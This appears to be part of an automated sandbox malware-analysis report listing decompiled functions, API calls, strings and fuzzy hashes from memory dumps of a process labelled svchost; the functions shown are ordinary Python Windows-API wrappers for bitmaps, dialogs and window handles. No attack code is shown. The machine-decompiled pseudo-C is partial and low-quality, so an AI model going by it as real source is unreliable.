                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Callable_CheckErr_Error@@FormatMessageObject_ParseRestoreSaveSendTupleWin_
                            • String ID: 2nd param must be callable (got type %s)$ListView_SortItemsEx$OO|O:ListView_SortItemsEx
                            • API String ID: 1280373063-2720867896
                            • Opcode ID: 5109bfa642738e3eea9c9a537127ef5cc9691d8e2fcf495e2d722d56baa34b1e
                            • Instruction ID: f9ece80c820d9ee4e937a5a5001c94bc2b3fec3e30c908afef81a802e6957a96
                            • Opcode Fuzzy Hash: 5109bfa642738e3eea9c9a537127ef5cc9691d8e2fcf495e2d722d56baa34b1e
                            • Instruction Fuzzy Hash: 8C213A75908205AFDB01AF68CC84A6A77F9FF45301F488669F945C3232E731D9668B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA923A0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOi:WaitForSingleObjectEx,00000000,?), ref: 6DA923CA
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA923E6
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA923F8
                            • PyErr_Occurred.PYTHON38 ref: 6DA92408
                            Strings
                            • OOi:WaitForSingleObjectEx, xrefs: 6DA923C1
                            • WaitForSingleObjectEx, xrefs: 6DA92445
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OOi:WaitForSingleObjectEx$WaitForSingleObjectEx
                            • API String ID: 1011514818-2631600235
                            • Opcode ID: 1d03a2becfa368ea9c146b0ede356c856d34868693f14648d2f362eed521d278
                            • Instruction ID: f7b150c9d1219dc7a629c8a2fb07c0931b2cad11ca2e14530c95851561497ab4
                            • Opcode Fuzzy Hash: 1d03a2becfa368ea9c146b0ede356c856d34868693f14648d2f362eed521d278
                            • Instruction Fuzzy Hash: 5B110A3512C2016BDB101B28DC08BAF3BF8FFC9325F948434F874C9191EB75C1A68A56
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAE100, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 66threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:SetWindowText,?,?), ref: 6DAAE12E
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAE14A
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000000,00000000,00000000), ref: 6DAAE164
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAE173
                            • SetWindowTextW.USER32(?,?), ref: 6DAAE183
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAE18C
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAAE19D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(SetWindowText,00000000), ref: 6DAAE1A9
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Eval_Thread$Arg_Error@@FreeParseRestoreSaveTextTupleWin_Window
                            • String ID: OO:SetWindowText$SetWindowText
                            • API String ID: 3577397743-795343297
                            • Opcode ID: 1bd9d3d7cdab051175109036562d01d6b34c51d1371ecfdc04260fbaffff9f6d
                            • Instruction ID: 3e8667909800d64297f112f3533a1be55a44040b41db0e8784d67e981fd43564
                            • Opcode Fuzzy Hash: 1bd9d3d7cdab051175109036562d01d6b34c51d1371ecfdc04260fbaffff9f6d
                            • Instruction Fuzzy Hash: CF119375508311AFEB009F24CC49B6B7BF8FF85355F488925F859C1171E7318966CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB1170, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 65threadwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 30%
                            			E6DAB1170(intOrPtr _a8) {
				int _v4;
				int _v8;
				int _v12;
				int _v16;
				int* _t14;
				void* _t16;
				struct HBITMAP__* _t17;
				long _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void** _t30;
				void** _t31;
				void* _t37;

				 *_t30 = 0;
				_t14 =  &_v4;
				__imp__PyArg_ParseTuple(_a8, "iiiiO:CreateBitmap", _t14,  &_v8,  &_v12,  &_v16, _t30);
				_t31 =  &(_t30[7]);
				if(_t14 == 0) {
					L3:
					return 0;
				} else {
					_t16 =  *_t31;
					_t37 = _t16 - __imp___Py_NoneStruct; // 0x6e294ce8
					if(_t37 == 0) {
						__imp__PyEval_SaveThread(_t22, _t26);
						SetLastError(0);
						_t17 = CreateBitmap(_v4, _v8, _v12, _v16, 0);
						_t23 = _t17;
						__imp__PyEval_RestoreThread(_t16);
						if(_t17 != 0) {
							L7:
							return E6DAA5630(_t21, _t23);
						} else {
							_t19 = GetLastError();
							if(_t19 == 0) {
								goto L7;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("CreateBitmap", _t19);
								return _t19;
							}
						}
					} else {
						__imp__PyErr_SetString( *__imp__PyExc_TypeError, "This param must be None");
						goto L3;
					}
				}
			}

















                            0x6dab1176
                            0x6dab118d
                            0x6dab119b
                            0x6dab11a1
                            0x6dab11a6
                            0x6dab11c8
                            0x6dab11cd
                            0x6dab11a8
                            0x6dab11a8
                            0x6dab11ab
                            0x6dab11b1
                            0x6dab11d0
                            0x6dab11da
                            0x6dab11f2
                            0x6dab11f9
                            0x6dab11fb
                            0x6dab1206
                            0x6dab1227
                            0x6dab1235
                            0x6dab1208
                            0x6dab1208
                            0x6dab1210
                            0x00000000
                            0x6dab1212
                            0x6dab1218
                            0x6dab1226
                            0x6dab1226
                            0x6dab1210
                            0x6dab11b3
                            0x6dab11bf
                            0x00000000
                            0x6dab11c5
                            0x6dab11b1

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,iiiiO:CreateBitmap,?,?,?,?), ref: 6DAB119B
                            • PyErr_SetString.PYTHON38(6E28ED8C,This param must be None), ref: 6DAB11BF
                              • Part of subcall function 6DAA5630: new.LIBCMT ref: 6DAA564C
                              • Part of subcall function 6DAA5630: ??0PyHANDLE@@QAE@PAX@Z.PYWINTYPES38(?), ref: 6DAA5669
                              • Part of subcall function 6DAA5630: DeleteObject.GDI32(?), ref: 6DAA5687
                              • Part of subcall function 6DAA5630: PyErr_NoMemory.PYTHON38 ref: 6DAA568D
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB11D0
                            • SetLastError.KERNEL32(00000000), ref: 6DAB11DA
                            • CreateBitmap.GDI32(?,?,?,?,00000000), ref: 6DAB11F2
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB11FB
                            • GetLastError.KERNEL32 ref: 6DAB1208
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(CreateBitmap,00000000), ref: 6DAB1218
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_ErrorEval_LastThread$Arg_BitmapCreateDeleteError@@MemoryObjectParseRestoreSaveStringTupleU_object@@Win_
                            • String ID: CreateBitmap$This param must be None$iiiiO:CreateBitmap
                            • API String ID: 4003298522-1973228922
                            • Opcode ID: ebc7ef254c420fbcfa0aaf7446c7f3ea1c5f93fdb68982e85f75efd4b8f1d9ec
                            • Instruction ID: 73d82dc5acbffed5fe289cce143a911dcae8943518c7f22ab2cb28d53fe51fc9
                            • Opcode Fuzzy Hash: ebc7ef254c420fbcfa0aaf7446c7f3ea1c5f93fdb68982e85f75efd4b8f1d9ec
                            • Instruction Fuzzy Hash: 0B11907240C201AFCB01AF54DC89BBB7BBDBF45201F484A29F585C1121E735D55B8BA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA922D0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:WaitForSingleObject,?), ref: 6DA922F5
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA92311
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA92323
                            • PyErr_Occurred.PYTHON38 ref: 6DA92333
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OO:WaitForSingleObject$WaitForSingleObject
                            • API String ID: 1011514818-2443890474
                            • Opcode ID: 6e3af3e7593d98acd157b1d3b89bafc66f6db733c477e61ac8d8e59db1fb22c1
                            • Instruction ID: ff771f9c539e3beff1fd65d5607289c6fc3908ff631f19b685d6c694c37f8566
                            • Opcode Fuzzy Hash: 6e3af3e7593d98acd157b1d3b89bafc66f6db733c477e61ac8d8e59db1fb22c1
                            • Instruction Fuzzy Hash: 24112B3552C2016BDB105B68EC09BAF3BF8BF89325F948134FC64C9190FB798599C65B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA92470, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 64COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:WaitForInputIdle,?), ref: 6DA92495
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA924B1
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DA924C3
                            • PyErr_Occurred.PYTHON38 ref: 6DA924D3
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskObject_OccurredParseTupleU_object@@Unsigned
                            • String ID: OO:WaitForInputIdle$WaitForInputIdle
                            • API String ID: 1011514818-4093374188
                            • Opcode ID: 6bcd4bf30a05a378a74f3f3084ce39e40e0384dfa71a63075491a06266bf0c72
                            • Instruction ID: 8fa216d9cb431ada0d22671c24c53e37d569f978867117efd9f574ed0f815498
                            • Opcode Fuzzy Hash: 6bcd4bf30a05a378a74f3f3084ce39e40e0384dfa71a63075491a06266bf0c72
                            • Instruction Fuzzy Hash: 64112B7552C2016BDB104B28EC09BAE3BF8BFCA325F948035FC64C5190FB74859AC69B
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAF4D0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 58threadwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAAF4D0(intOrPtr _a8) {
				void* _v4;
				int _v8;
				int _v12;
				long _v16;
				long* _t12;
				void** _t13;
				long _t15;
				void* _t16;
				long _t17;
				void* _t20;

				_v16 = 0;
				_t12 =  &_v16;
				__imp__PyArg_ParseTuple(_a8, "Oii:ImageList_GetIcon", _t12,  &_v8,  &_v12);
				if(_t12 != 0) {
					_t13 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v16, _t13);
					if(_t13 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t16, _t20);
						SetLastError(0);
						_t15 = ImageList_GetIcon(_v4, _v8, _v12);
						_t17 = _t15;
						__imp__PyEval_RestoreThread(_t13);
						if(_t17 != 0) {
							L6:
							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t17);
							return _t15;
						} else {
							_t15 = GetLastError();
							if(_t15 == 0) {
								goto L6;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("ImageList_GetIcon", _t15);
								return _t15;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}













                            0x6daaf4d7
                            0x6daaf4e4
                            0x6daaf4f2
                            0x6daaf4fd
                            0x6daaf505
                            0x6daaf50e
                            0x6daaf519
                            0x00000000
                            0x6daaf51b
                            0x6daaf51d
                            0x6daaf527
                            0x6daaf539
                            0x6daaf540
                            0x6daaf542
                            0x6daaf54d
                            0x6daaf56e
                            0x6daaf56f
                            0x6daaf57d
                            0x6daaf54f
                            0x6daaf54f
                            0x6daaf557
                            0x00000000
                            0x6daaf559
                            0x6daaf55f
                            0x6daaf56d
                            0x6daaf56d
                            0x6daaf557
                            0x6daaf54d
                            0x6daaf4ff
                            0x6daaf4ff
                            0x6daaf504
                            0x6daaf504

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oii:ImageList_GetIcon,?,?,?), ref: 6DAAF4F2
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAF50E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAF51D
                            • SetLastError.KERNEL32(00000000), ref: 6DAAF527
                            • ImageList_GetIcon.COMCTL32(?,?,?), ref: 6DAAF539
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAF542
                            • GetLastError.KERNEL32 ref: 6DAAF54F
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ImageList_GetIcon,00000000), ref: 6DAAF55F
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@IconImageList_Object_ParseRestoreSaveTupleWin_
                            • String ID: ImageList_GetIcon$Oii:ImageList_GetIcon
                            • API String ID: 2386716884-2218718920
                            • Opcode ID: 53a9d25af77acca4092fa149ea96ef91811f0958360688b930d7763d16f8014d
                            • Instruction ID: 0a673d63193ff9503978285799ac78425886cdfae79c18117b10488e46e162d7
                            • Opcode Fuzzy Hash: 53a9d25af77acca4092fa149ea96ef91811f0958360688b930d7763d16f8014d
                            • Instruction Fuzzy Hash: B711737A40C302AFDB006F68CC49BAB7BB8EF85211F488629F959C1121E735C5569B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA8500, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 57threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:GetWindowPlacement), ref: 6DAA8510
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA852C
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA8543
                            • GetWindowPlacement.USER32(0000002C,0000002C), ref: 6DAA8554
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA855D
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetWindowPlacement,00000000), ref: 6DAA8573
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_ThreadU_object@@$Arg_Error@@Object_ParsePlacementRestoreSaveTupleWin_Window
                            • String ID: (ii(ii)(ii)(iiii))$,$GetWindowPlacement$O:GetWindowPlacement
                            • API String ID: 2077839949-131567012
                            • Opcode ID: 6c90e91fb808c2b7da22b83fdc5b4d3fbf74cc13ababe98dfdceb1ec8026ccaf
                            • Instruction ID: 746d34c99b99e353d64ccad38da1b623216a1e1519c1ef8a56816caa162c03c3
                            • Opcode Fuzzy Hash: 6c90e91fb808c2b7da22b83fdc5b4d3fbf74cc13ababe98dfdceb1ec8026ccaf
                            • Instruction Fuzzy Hash: 0A01B1B1808341AFDB006B65CC49B6B7BB8BF81201F484A28FC55C1231E731CA2A8A97
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAACD00, Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 56COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,GetLayeredWindowAttributes), ref: 6DAACD1D
                            • PyArg_ParseTupleAndKeywords.PYTHON38(?,?,O:GetLayeredWindowAttributes,6DAC7ADC,?), ref: 6DAACD41
                            Strings
                            • %s is not available on this platform, xrefs: 6DAACD16
                            • GetLayeredWindowAttributes, xrefs: 6DAACD11
                            • O:GetLayeredWindowAttributes, xrefs: 6DAACD34
                            • kbk, xrefs: 6DAACDA8
                            • GetLayeredWindowAttributes, xrefs: 6DAACD88
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatKeywordsParseTuple
                            • String ID: %s is not available on this platform$GetLayeredWindowAttributes$GetLayeredWindowAttributes$O:GetLayeredWindowAttributes$kbk
                            • API String ID: 223827023-3646884599
                            • Opcode ID: 65ee89149d1d00b70a3219fe986427c6ac3713de6ce60463023ab664fd2d2551
                            • Instruction ID: 55ba5fd4fa6c8938c7ea21a2c00a729a0870148e9499086084042c87097ed6d6
                            • Opcode Fuzzy Hash: 65ee89149d1d00b70a3219fe986427c6ac3713de6ce60463023ab664fd2d2551
                            • Instruction Fuzzy Hash: CA1146BA40C201BFDB005F59CC459677BB8FF40205F488668F95981032F736D6669B63
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAADCA0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 55threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAADCA0(intOrPtr _a8) {
				struct HWND__* _v4;
				int _v8;
				long _v12;
				long* _t9;
				struct HWND__** _t10;
				long _t12;
				void* _t13;
				long _t14;
				void* _t17;

				_v12 = 0;
				_t9 =  &_v12;
				__imp__PyArg_ParseTuple(_a8, "Oi:GetDlgItem", _t9,  &_v8);
				if(_t9 != 0) {
					_t10 =  &_v4;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v12, _t10);
					if(_t10 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t13, _t17);
						SetLastError(0);
						_t12 = GetDlgItem(_v4, _v8);
						_t14 = _t12;
						__imp__PyEval_RestoreThread(_t10);
						if(_t14 != 0) {
							L6:
							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t14);
							return _t12;
						} else {
							_t12 = GetLastError();
							if(_t12 == 0) {
								goto L6;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("GetDlgItem", _t12);
								return _t12;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}












                            0x6daadca7
                            0x6daadcaf
                            0x6daadcbd
                            0x6daadcc8
                            0x6daadcd0
                            0x6daadcd9
                            0x6daadce4
                            0x00000000
                            0x6daadce6
                            0x6daadce8
                            0x6daadcf2
                            0x6daadd00
                            0x6daadd07
                            0x6daadd09
                            0x6daadd14
                            0x6daadd35
                            0x6daadd36
                            0x6daadd44
                            0x6daadd16
                            0x6daadd16
                            0x6daadd1e
                            0x00000000
                            0x6daadd20
                            0x6daadd26
                            0x6daadd34
                            0x6daadd34
                            0x6daadd1e
                            0x6daadd14
                            0x6daadcca
                            0x6daadcca
                            0x6daadccf
                            0x6daadccf

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi:GetDlgItem,?,?), ref: 6DAADCBD
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAADCD9
                            • PyEval_SaveThread.PYTHON38 ref: 6DAADCE8
                            • SetLastError.KERNEL32(00000000), ref: 6DAADCF2
                            • GetDlgItem.USER32 ref: 6DAADD00
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAADD09
                            • GetLastError.KERNEL32 ref: 6DAADD16
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(GetDlgItem,00000000), ref: 6DAADD26
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@ItemObject_ParseRestoreSaveTupleWin_
                            • String ID: GetDlgItem$Oi:GetDlgItem
                            • API String ID: 2906612425-93230050
                            • Opcode ID: 5670693d42d80830013716f1d2699f05c428b6a4677f3ea2852490bc8016faa0
                            • Instruction ID: 75b9a7f0dfdd08be4fbdc67f818653bc2f8bad2f3d78a21c84943d34e2fdf04a
                            • Opcode Fuzzy Hash: 5670693d42d80830013716f1d2699f05c428b6a4677f3ea2852490bc8016faa0
                            • Instruction Fuzzy Hash: 560182755082016FDF006F649D4976B3BB8FF81612F488A29FD89C1121F735856ADAA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB80D0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 53threadCOMMON
                            Download Yara Rule
                            C-Code - Quality: 16%
                            			E6DAB80D0(intOrPtr _a8) {
				struct tagPOINT _v8;
				long _v12;
				long* _t6;
				struct tagPOINT* _t7;
				long _t9;
				void* _t10;
				long _t11;
				void* _t14;

				_t6 =  &_v12;
				_v12 = 0;
				__imp__PyArg_ParseTuple(_a8, "O:WindowFromPoint", _t6);
				if(_t6 != 0) {
					_t7 =  &_v8;
					__imp__?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z(_v12, _t7);
					if(_t7 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t10, _t14);
						SetLastError(0);
						_t9 = WindowFromPoint(_v8);
						_t11 = _t9;
						__imp__PyEval_RestoreThread(_t7, _v8.y);
						if(_t11 != 0) {
							L6:
							__imp__?PyWinLong_FromHANDLE@@YAPAU_object@@PAX@Z(_t11);
							return _t9;
						} else {
							_t9 = GetLastError();
							if(_t9 == 0) {
								goto L6;
							} else {
								__imp__?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z("WindowFromPoint", _t9);
								return _t9;
							}
						}
					}
				} else {
					L1:
					return 0;
				}
			}











                            0x6dab80d3
                            0x6dab80d6
                            0x6dab80e7
                            0x6dab80f2
                            0x6dab80fa
                            0x6dab8103
                            0x6dab810e
                            0x00000000
                            0x6dab8110
                            0x6dab8112
                            0x6dab811c
                            0x6dab812a
                            0x6dab8131
                            0x6dab8133
                            0x6dab813e
                            0x6dab815f
                            0x6dab8160
                            0x6dab816e
                            0x6dab8140
                            0x6dab8140
                            0x6dab8148
                            0x00000000
                            0x6dab814a
                            0x6dab8150
                            0x6dab815e
                            0x6dab815e
                            0x6dab8148
                            0x6dab813e
                            0x6dab80f4
                            0x6dab80f4
                            0x6dab80f9
                            0x6dab80f9

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,O:WindowFromPoint), ref: 6DAB80E7
                            • ?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z.PYWINTYPES38(?,?), ref: 6DAB8103
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB8112
                            • SetLastError.KERNEL32(00000000), ref: 6DAB811C
                            • WindowFromPoint.USER32(?,?), ref: 6DAB812A
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB8133
                            • GetLastError.KERNEL32 ref: 6DAB8140
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(WindowFromPoint,00000000), ref: 6DAB8150
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: ErrorEval_LastThreadU_object@@$Arg_Error@@FromObject_ParsePointRestoreSaveT@@@TupleUtagWin_Window
                            • String ID: O:WindowFromPoint$WindowFromPoint
                            • API String ID: 3537070314-1666126683
                            • Opcode ID: 52e01b2cd298ab18c47fe2326a6176857c4d3ea474c93852e5af41fd165cc0a2
                            • Instruction ID: 5178c8f3697323c87afeee65903b3c747dd7955c86fcc2d1a10d274958dfa8f1
                            • Opcode Fuzzy Hash: 52e01b2cd298ab18c47fe2326a6176857c4d3ea474c93852e5af41fd165cc0a2
